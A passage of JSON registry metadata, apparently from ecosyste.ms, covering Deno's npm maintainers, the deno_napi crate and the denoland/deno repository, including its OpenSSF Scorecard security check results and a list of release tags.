0:15.048Z","updated_at":"2024-12-12T21:50:15.048Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ry/packages"},{"uuid":"divy-work","login":"divy-work","name":null,"email":"dj.srivastava23@gmail.com","url":null,"packages_count":45,"html_url":"https://www.npmjs.com/~divy-work","role":null,"created_at":"2024-12-12T21:50:16.425Z","updated_at":"2024-12-12T21:50:16.425Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/divy-work/packages"},{"uuid":"denobot","login":"denobot","name":null,"email":"denobot@deno.com","url":null,"packages_count":28,"html_url":"https://www.npmjs.com/~denobot","role":null,"created_at":"2024-12-12T21:50:17.165Z","updated_at":"2024-12-12T21:50:17.165Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/denobot/packages"},{"uuid":"bartlomieju","login":"bartlomieju","name":null,"email":"biwanczuk@gmail.com","url":null,"packages_count":26,"html_url":"https://www.npmjs.com/~bartlomieju","role":null,"created_at":"2026-03-27T13:03:31.364Z","updated_at":"2026-03-27T13:03:31.364Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/bartlomieju/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5812038,"maintainers_count":1244003,"namespaces_count":426096,"keywords_count":888784,"github":"npm","metadata":{"funded_packages_count":192391,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-01T05:02:08.896Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":5307677,"name":"deno_napi","ecosystem":"cargo","description":"NAPI implementation for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":188,"first_release_published_at":"2022-10-05T14:15:14.962Z","latest_release_published_at":"2026-08-06T11:47:23.779Z","latest_release_number":"0.188.0","last_synced_at":"2026-08-29T21:57:15.960Z","created_at":"2022-10-05T14:25:30.078Z","updated_at":"2026-08-29T21:57:15.960Z","registry_url":"https://crates.io/crates/deno_napi/","install_command":"cargo install deno_napi","documentation_url":"https://docs.rs/deno_napi/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitH